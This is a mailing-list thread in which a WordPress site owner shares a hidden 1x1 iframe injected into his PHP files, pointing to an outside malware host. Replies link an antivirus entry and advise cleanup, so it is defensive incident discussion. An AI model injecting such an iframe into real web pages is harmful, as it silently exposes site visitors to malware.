hack in the loose, or old stuff?

classic Classic list List threaded Threaded
5 messages Options
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

hack in the loose, or old stuff?

Denis de Bernardy
Has anyone come accross something along these lines before?


<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?> <iframe src="http://196.regvista.com/index.php?ref=r22" width=1 height=1
marginheight=0 marginwidth=0 scrolling=auto border="0" noresize
style='display:none;'></iframe>


Denis

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: hack in the loose, or old stuff?

Andy Skelton
On 4/10/06, Denis de Bernardy <[hidden email]> wrote:
> Has anyone come accross something along these lines before?
>

No, and it looks bad.
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: hack in the loose, or old stuff?

Kaf Oseo
In reply to this post by Denis de Bernardy
http://www.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html

See the technical details for sites which *may* contain the files
for the exploit.

-Kaf
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

RE: hack in the loose, or old stuff?

Denis de Bernardy
yeah, that would probably be the src file of the iframe. a grep on the
server revealed that pretty much every php file had been modified, hence my
posting the question over here.

Oh well...
D.


> -----Original Message-----
> From: [hidden email]
> [mailto:[hidden email]] On Behalf Of Kaf Oseo
> Sent: Monday, April 10, 2006 4:16 PM
> To: [hidden email]
> Subject: Re: [wp-hackers] hack in the loose, or old stuff?
>
>
> http://www.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html
>
> See the technical details for sites which *may* contain the
> files for the exploit.
>
> -Kaf
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: hack in the loose, or old stuff?

Robert Deaton
On 4/10/06, Denis de Bernardy <[hidden email]> wrote:
> yeah, that would probably be the src file of the iframe. a grep on the
> server revealed that pretty much every php file had been modified, hence my
> posting the question over here.
>

Now might be a _great_ time to start changing passwords, cleaning
files, scanning for rootkits, fixing file permissions, etc.

--
--Robert Deaton
http://somethingunpredictable.com

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Loading...